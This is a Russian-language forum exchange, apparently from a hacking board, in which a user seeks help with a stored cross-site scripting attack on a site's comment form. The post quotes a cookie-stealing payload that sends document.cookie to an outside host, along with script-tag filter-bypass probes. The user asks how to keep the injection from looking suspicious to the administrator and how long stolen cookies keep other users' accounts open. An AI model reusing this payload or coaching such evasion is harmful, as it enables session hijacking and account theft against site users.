Сообщение от
None
Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.
ты имеешь виду чтобы такого небыло :
Это появляется когда я в строке name пишу
img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;
, а вот source :
Name: test
Message: This is a test comment.
Name: img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;
Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже.
Сообщение от
None
Я уже писал выше, там нужно
ript>alert()
потому что вырезает только а не трогает.
я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать ript>alert()ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> :
, и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ?
И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )